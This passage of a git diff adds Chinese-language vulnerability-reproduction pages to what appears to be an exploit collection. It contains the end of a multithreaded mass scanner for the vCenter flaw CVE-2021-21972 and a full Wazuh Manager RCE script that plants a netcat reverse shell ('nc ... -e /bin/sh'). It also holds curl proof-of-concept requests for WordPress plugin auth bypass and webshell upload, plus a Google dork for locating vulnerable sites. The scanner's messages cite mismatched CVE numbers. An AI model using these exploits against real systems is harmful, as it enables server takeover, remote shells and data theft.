10_12_6)' + ] + chrome_version = 'Chrome/{}.0.{}.{}'.format(first_num, third_num, fourth_num) + + ua = ' '.join(['Mozilla/5.0', random.choice(os_type), 'AppleWebKit/537.36', + '(KHTML, like Gecko)', chrome_version, 'Safari/537.36'] + ) + return ua + + +def CVE_2021_21972(url): + # proxies = {"scoks5": "http://127.0.0.1:1081"} + proxies = { + "http": "http://127.0.0.1:8080", + "https": "http://127.0.0.1:8080", + } + headers = { + 'User-Agent': get_ua() + } + # data = base64.b64decode(Payload) + # files = {'uploadFile': open('all.tar', 'rb')} #linux + files = {'uploadFile': open('test.tar', 'rb')} #win + targetUrl = url + TARGET_URI + try: + res = requests.post(url=targetUrl, + headers=headers, + files=files, + verify=False, + proxies=proxies) + # proxies={'socks5': 'http://127.0.0.1:1081'}) + if res.status_code == 200 and "SUCCESS" in res.text: + print("[+] URL:{}--------存在CVE-2021-21872漏洞".format(url)) + # print("[+] Command success result: " + res.text + "\n") + with open("存在漏洞地址.txt", 'a') as fw: + fw.write(url + '\n') + else: + print("[-] " + url + " 没有发现CVE-2020-14882漏洞.\n") + # except Exception as e: + # print(e) + except: + print("[-] " + url + " Request ERROR.\n") +def 
multithreading(filename, pools=5): + works = [] + with open(filename, "r") as f: + for i in f: + func_params = [i.rstrip("\n")] + # func_params = [i] + [cmd] + works.append((func_params, None)) + pool = threadpool.ThreadPool(pools) + reqs = threadpool.makeRequests(CVE_2021_21972, works) + [pool.putRequest(req) for req in reqs] + pool.wait() + +def main(): + parser = argparse.ArgumentParser() + parser.add_argument("-u", + "--url", + help="Target URL; Example:http://ip:port") + parser.add_argument("-f", + "--file", + help="Url File; Example:url.txt") + # parser.add_argument("-t", + # "--tar", + # help="Create tar File; Example:test.tar") + # parser.add_argument("-c", "--cmd", help="Commands to be executed; ") + args = parser.parse_args() + url = args.url + # cmd = args.cmd + file_path = args.file + # jsp = args.tar + # if jsp != None: + # print(jsp) + # generate_zip(jsp) + if url != None and file_path ==None: + CVE_2021_21972(url) + elif url == None and file_path != None: + multithreading(file_path, 10) # 默认15线程 + +if __name__ == "__main__": + main() +``` + diff --git a/服务器应用漏洞/Wazuh Manager 代码执行漏洞 CVE-2021-26814.md b/服务器应用漏洞/Wazuh Manager 代码执行漏洞 CVE-2021-26814.md new file mode 100644 index 0000000..c60f07f --- /dev/null +++ b/服务器应用漏洞/Wazuh Manager 代码执行漏洞 CVE-2021-26814.md 
@@ -0,0 +1,151 @@ +# Wazuh Manager 代码执行漏洞CVE-2021-26814 + +## 漏洞描述 + +Wazuh 从4.0.0到4.0.3的 Wazuh API允许经过身份验证的用户通过/manager/files URI以管理权限执行任意代码。 + +## 漏洞影响 + +``` +Wazuh Manager v.4.0.0-4.0.3 +``` + +## 漏洞复现 + +poc: + +``` +PoC.py [-h] -user USERNAME -pwd PASSWORD -lip SRCIP -lport SRCPORT -tip + DESTIP -tport DESTPORT +``` + +```python +# Exploit Title: Wazuh 4.0.3 API RCE +# Author: WickdDavid (Davide Meacci) +# Date: 2021-01-01 +# Vendor Homepage: https://github.com/wazuh/wazuh +# Version : 4.0.3 + + +import requests +import sys +import argparse +import time +import json +from urllib3.exceptions import InsecureRequestWarning +requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning) + + +parser = argparse.ArgumentParser(description='Wazuh-manager authenticated RCE by WickdDavid') +parser.add_argument('-user', dest='username',required=True, + help='wazuh API username') +parser.add_argument('-pwd', dest='password',required=True, + help='wazuh API password') +parser.add_argument('-lip', dest='srcip',required=True, + help='listening server') +parser.add_argument('-lport', dest='srcport',required=True, + help='listening port') +parser.add_argument('-tip', dest='destip',required=True, + help='target server ip (wazuh API)') +parser.add_argument('-tport', dest='destport',required=True, + help='target server port (wazuh API)') + + +args = parser.parse_args() + +# executed payload may be changed here + +exec_payload = """ +import os #:l +os.system("nc %s %s -e /bin/sh") #:l +""" % (args.srcip, args.srcport) + + +config_payload = { "drop_privileges": False } + + +proxies = { + "http":"http://127.0.0.1:8080", + "https":"https://127.0.0.1:8080" +} + +target = "https://%s:%s" % (args.destip,args.destport) +auth_token = "" +path_traversal = "etc/lists/../../../../.." 
+headers = {} + +# step 1 - obtaining auth token + +r = requests.get("%s/security/user/authenticate?raw=true" % target, auth=(args.username, args.password),verify=False) + +if(r.status_code == 200): + auth_token = r.text + headers["Authorization"] = "Bearer %s" % auth_token +else: + print("[!] No auth code recovered. Check username and password") + exit(1) + +# step 2 - Privilege Escalation on API (not implemented) + + +# step 3 - Save files to be restored later + +file_to_overwrite = "/var/ossec/api/scripts/wazuh-apid.py" +print("[+] Saving files to restore later...") +r = requests.get("%s/manager/files?path=%s%s" % (target,path_traversal,file_to_overwrite), headers = headers, verify=False) +f = open("backup.py","w") +f.write(json.loads(r.text)["contents"]) +f.close() +time.sleep(1) + +# step 4 - Local Privilege Escalation + +print("[+] Changing API config to run as root...") +r = requests.put("%s/manager/api/config" % target, headers = headers, json = config_payload, verify=False) +time.sleep(1) + +# step 5 - Restart server (now api service runs as root) + +print("[+] Restarting server...") +r = requests.put("%s/manager/restart?wait_for_complete=true" % target, headers = headers,verify=False) +#print(r.text) + +data = {"title":"Bad Request"} +while "title" in data and "Bad request" in data["title"]: + time.sleep(5) + try: + r = requests.get("%s/manager/status" % target, headers = headers, verify=False) + #print(r.text) + data = json.loads(r.text) + except: + continue + +# step 6 - Overwrite /var/ossec/api/scripts/wazuh-apid.py with malicious python payload + +print("[+] Uploading payload...") +r = requests.put("%s/manager/files?path=%s%s&overwrite=true" % (target,path_traversal,file_to_overwrite), headers = headers, data = exec_payload, verify=False) +#print(r.text) +time.sleep(1) + +# step 7 - Restart server (now malicious payload will be run by the server) + + +print("[+] Restarting API service for the last time...") +r = 
requests.put("%s/manager/restart?wait_for_complete=true" % target, headers = headers,verify=False) +#print(r.text) + +data = {"title":"Bad Request"} +while "title" in data and "Bad request" in data["title"]: + time.sleep(5) + try: + r = requests.get("%s/manager/status" % target, headers = headers, verify=False) + #print(r.text) + data = json.loads(r.text) + except: + continue + + +print("[+] Payload executed, check your shell now.") +print("[+] Remember to restore changed file (check local backup file)") +``` + diff --git a/服务器应用漏洞/WordPress Elementor Page Builder Plus 身份验证绕过 CVE-2021-24175.md b/服务器应用漏洞/WordPress Elementor Page Builder Plus 身份验证绕过 CVE-2021-24175.md new file mode 100644 index 0000000..169eb93 --- /dev/null +++ b/服务器应用漏洞/WordPress Elementor Page Builder Plus 身份验证绕过 CVE-2021-24175.md @@ -0,0 +1,42 @@ +# WordPress Elementor Page Builder Plus 身份验证绕过 CVE-2021-24175 + +## 漏洞描述 + +未经身份验证的用户可以使用"theplus_ajax_login"和"theplus_google_ajax_register" Ajax请求,通过仅提供相关的用户名,就可以像任何用户一样轻松地进行身份验证。 + +参考链接: + +- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-24175 +- https://wpscan.com/vulnerability/c311feef-7041-4c21-9525-132b9bd32f89 + +## 漏洞影响 + +``` +Elementor Page Builder <4.1.7 +``` + +## 漏洞复现 + +poc: + +``` +curl -X POST --data action=theplus_ajax_login --data email=admin -iLSS https://example.com/wp-admin/admin-ajax.php +curl -X POST --data action=theplus_google_ajax_register --data email=admin --data nonce=a -iLSS https://example.com/wp-admin/admin-ajax.php +``` + +"theplus_google_ajax_register" AJAX请求还可以允许任何未经身份验证的用户创建具有任意角色的帐户,例如admin,然后登录。 + +html: + +```html +
+ + + + + + + +
+``` + diff --git a/服务器应用漏洞/WordPress File Manager<6.9 RCE CVE-2020-25213.md b/服务器应用漏洞/WordPress File Manager<6.9 RCE CVE-2020-25213.md new file mode 100644 index 0000000..b0c5000 --- /dev/null +++ b/服务器应用漏洞/WordPress File Manager<6.9 RCE CVE-2020-25213.md @@ -0,0 +1,41 @@ +# WordPress File Manager<6.9 RCE CVE-2020-25213 + +## 漏洞复现 + +poc: + +``` +curl -ks --max-time 5 -F "reqid=17457a1fe6959" -F "cmd=upload" -F "target=l1_Lw" -F "mtime[]=1576045135" -F "upload[]=@/$file_upload" "hxxps://victim.com/wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php" +``` + +``` +POST /wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php HTTP/1.1 +Content-Length: 631 +Content-Type: multipart/form-data; boundary=------------------------9689147a5989a801 +Connection: close + +--------------------------9689147a5989a801 +Content-Disposition: form-data; name="reqid" + +17457a1fe6959 +--------------------------9689147a5989a801 +Content-Disposition: form-data; name="cmd" + +upload +--------------------------9689147a5989a801 +Content-Disposition: form-data; name="target" + +l1_Lw +--------------------------9689147a5989a801 +Content-Disposition: form-data; name="mtime[]" + +1576045135 +--------------------------9689147a5989a801 +Content-Disposition: form-data; name="upload[]"; filename="1.php" +Content-Type: application/octet-stream + + + +--------------------------9689147a5989a801-- +``` + diff --git a/服务器应用漏洞/WordPress SuperForms 4.9 任意文件上传到远程代码执行.md b/服务器应用漏洞/WordPress SuperForms 4.9 任意文件上传到远程代码执行.md new file mode 100644 index 0000000..23c9413 --- /dev/null +++ b/服务器应用漏洞/WordPress SuperForms 4.9 任意文件上传到远程代码执行.md 
@@ -0,0 +1,71 @@
+# WordPress SuperForms 4.9 任意文件上传到远程代码执行
+
+## 漏洞描述
+
+SuperForms官方链接:https://renstillmann.github.io/super-forms/#/
+
+参考链接:
+
+- https://www.exploit-db.com/exploits/49490
+
+## 漏洞影响
+
+```
+All (<= 4.9.X)
+```
+
+## Google Dork
+
+```
+inurl:"/wp-content/plugins/super-forms/"
+```
+
+## 漏洞复现
+
+poc:
+
+```
+POST /wp-content/plugins/super-forms/uploads/php/ HTTP/1.1
+ <=== exploit end point
+Host: localhost
+User-Agent: UserAgent
+Accept: application/json, text/javascript, */*; q=0.01
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+X-Requested-With: XMLHttpRequest
+Content-Type: multipart/form-data;
+boundary=---------------------------423513681827540048931513055996
+Content-Length: 7058
+Origin: localhost
+Connection: close
+Referer: localhost
+Cookie:
+
+-----------------------------423513681827540048931513055996
+Content-Disposition: form-data; name="accept_file_types"
+
+jpg|jpeg|png|gif|pdf|JPG|JPEG|PNG|GIF|PDF <=======
+inject extension (|PHP4) to validate file to upload
+-----------------------------423513681827540048931513055996
+Content-Disposition: form-data; name="max_file_size"
+
+8000000
+-----------------------------423513681827540048931513055996
+Content-Disposition: form-data; name="image_library"
+
+0
+-----------------------------423513681827540048931513055996
+Content-Disposition: form-data; name="files[]";
+filename="filename.(extension)" <==== inject code extension (.php4)
+for example
+Content-Type: application/pdf
+
+Evil codes to be uploaded
+
+-----------------------------423513681827540048931513055996--
+
+# Uploaded Malicious File can be Found in :
+/wp-content/uploads/superforms/2021/01//filename.php4
+u can get from server reply .
+```
+
diff --git a/服务器应用漏洞/images/16142224147525.jpg b/服务器应用漏洞/images/16142224147525.jpg
new file mode 100644
index 0000000..9e38f82
Binary files /dev/null and b/服务器应用漏洞/images/16142224147525.jpg differ
diff --git a/服务器应用漏洞/images/image-20221207141353136.png b/服务器应用漏洞/images/image-20221207141353136.png
new file mode 100644
index 0000000..946d38d
Binary files /dev/null and b/服务器应用漏洞/images/image-20221207141353136.png differ
diff --git a/服务器应用漏洞/images/image-20221207141859357.png b/服务器应用漏洞/images/image-20221207141859357.png
new file mode 100644
index 0000000..4df9ee3
Binary files /dev/null and b/服务器应用漏洞/images/image-20221207141859357.png differ